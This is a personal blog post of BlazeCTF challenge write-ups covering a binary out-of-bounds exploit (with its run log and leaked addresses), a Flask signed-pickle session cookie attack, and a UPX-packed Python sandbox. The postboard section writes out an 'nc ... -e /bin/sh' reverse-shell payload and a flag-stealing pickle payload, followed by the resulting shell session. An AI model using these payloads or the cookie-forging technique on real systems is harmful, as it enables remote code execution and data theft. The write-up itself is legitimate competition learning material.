Hi

I particpated in blazectf in my free time with irGeeks team and seems we got 2nd place at the end. Here you can see some of my brief writeups.

dmail

Dmail was a pwnable task which has plenty of security mechanisms enabled:

gdb-peda$ checksec 
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : FULL
gdb-peda$ 

A little bit working with executable reveals the vulnerability. In sending_mail function you should set an index. the index is not properly checked so you can abuse it to out-of-bound reading and writing. In order to pwn the task we should do the following:
1. leak heap address
2. leak libc_bss address (arena)
3. calculate libc_base, exe_base
4. calculate one of the saved stack frame pointer
5. overwrite the frame pointer with controllable address
6. pwn!

TL;DR

hamidx9@expl:~/ctf/blaze/dmail$ python sol.py 
[+] Opening connection to 107.170.17.158 on port 4201: Done
[DEBUG] 1
[DEBUG] 2
[DEBUG] 3
[DEBUG] 4
[DEBUG] 5
[DEBUG] -1
[DEBUG] -1
libc_bss: 0x7f0cf2967000
libc_base: 0x7f0cf25a9000
exe_base: 0x7f0cf2b93000
[DEBUG] 72
[DEBUG] -1
heap_base: 0x7f0cf3b71000
[DEBUG] 73
[DEBUG] 4
[DEBUG] 103
fgets_got: 0x7f0cf2617060
[DEBUG] 4
[DEBUG] 103
libc_start: 0x7f0cf25c9dd0
[DEBUG] 4
[DEBUG] 103
mapped_addr: 0x7f0cf2d8d040
[DEBUG] 4
[DEBUG] 103
cookie_leak_addr: 0x7f0cf2d8c768
cookie_leak: 0xd819065973d8bc00
[DEBUG] 4
[DEBUG] 103
stacl_addr: 0x7fff7f745bf0
rbp_loc: 0x7fff7f745b80
[DEBUG] 2
[DEBUG] 3
[DEBUG] 130215815534
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /home/dmail/dmail_flag
blaze{Congratulations, you've unlocked your first BlazeCTF recipe, DANK GARLICBREAD, the recipes button above the scoreboard should now be unlocked}
$  

you can see my exploit below with some comments. We got 420pts. full exploit: sol.py

Postboard

This was a web task with flask and saving some posts online.
before starting the server reads flag and save it into posts['flag']. You can see full server code here.

According to flask the session will be saved in client side cookie. So if we can generate arbitrary pickle dump and use as our cookie we can run arbitrary codes.
Also we know the secret so the following procedure should be done:

  1. generate something like os.system("nc ip_address 4444 -e /bin/sh") pickle dump and use as cookie.
  2. Server will be connected to mine and we have a shell.

but ../flagdir/flag is owed by root and has 700 perm. Instead we can read the flag from the global dict posts. dumps of a pickle like this can finish the task:

import os; nn=posts.get("flag"); fl=open("/tmp/shell", "w"); mm=fl.write(nn.i); fl.close()

since a had a shell on /tmp/shell fifo, i just wrote the flag into it.

hamidx@ubuntu:~$ nc -l -v 4444
Listening on [0.0.0.0] (family 0, port 4444)
aConnection from [46.101.248.243] port 4444 [tcp/*] accepted (family 2, sport 40810)
ls
ls
index.html
login.html
nc
newpost.html
register.html
server2.py
server.py
server.pyc
ls -la ../flagdir/
total 12
drwxrwxr-x 2 root root 4096 Apr 20 20:58 .
drwxr-xr-x 4 post post 4096 Apr 20 20:39 ..
-rwx------ 1 root root   50 Apr 20 20:58 flag
BLAZE{pickle_is_super_secure_with_signing_right?}

full exploits: sol.py flag_to_sock.py

here we have another 420pts.

mpi

I couldn't find a good infoleak in time to pwn the challenge but i had write-what-where condition easily.

write-what-where.py

snake

This was a python task again. ofcourse we should unpack the custom upx first but i had a better solution:

hamidx9@expl:~/ctf/blaze/snake$ ./snake &
[1] 22987
hamidx9@expl:~/ctf/blaze/snake$ 
Let's go on a date a21df
Prove to me you're worth it
$ 

[1]+  Stopped                 ./snake
hamidx9@expl:~/ctf/blaze/snake$ 
hamidx9@expl:~/ctf/blaze/snake$ ps x
  PID TTY      STAT   TIME COMMAND
16502 ?        S      0:01 sshd: hamidx9@pts/3 
16503 pts/3    Ss+    0:00 -bash
17110 ?        S      0:00 sshd: hamidx9@pts/8 
17111 pts/8    Ss+    0:00 -bash
21244 ?        R      0:00 sshd: hamidx9@pts/0 
21245 pts/0    Ss     0:00 -bash
22987 pts/0    T      0:00 ./snake
22988 pts/0    T      0:00 ./snake
22989 pts/0    R+     0:00 ps x
hamidx9@expl:~/ctf/blaze/snake$ gcore 22988

Program received signal SIGTTIN, Stopped (tty input).
0x00007f81eae19810 in ?? ()
Saved corefile core.22988
hamidx9@expl:~/ctf/blaze/snake$ ls
core.15870  core.15871  core.22988  log.txt  mem1  q.py  snake  upx-3.91-amd64_linux  upx-3.91-amd64_linux.tar.bz2
hamidx9@expl:~/ctf/blaze/snake$ strings -a core.22988 | grep '#!/usr/bin/python'
#!/usr/bin/python
#!/usr/bin/python
hamidx9@expl:~/ctf/blaze/snake$ strings -a core.22988 | grep '#!/usr/bin/python' -A10
#!/usr/bin/python
# -*- coding: utf=8 -*-
import datetime
import random
import string
import hashlib
from sys import modules
from threading import Thread
from imp import acquire_lock
# Flag is not in a file.
def validation(attempt):
--
#!/usr/bin/python
# -*- coding: utf=8 -*-
import datetime
import random
import string
import hashlib
from sys import modules
from threading import Thread
from imp import acquire_lock
# Flag is not in a file.
def validation(attempt):
hamidx9@expl:~/ctf/blaze/snake$ 

Here you can see the python sandbox and verification proc: task.py

Seems the snadbox did not delete datetime module. anyway i had no time to pwn the chall.

Regards,

Hamid Zamani

Comments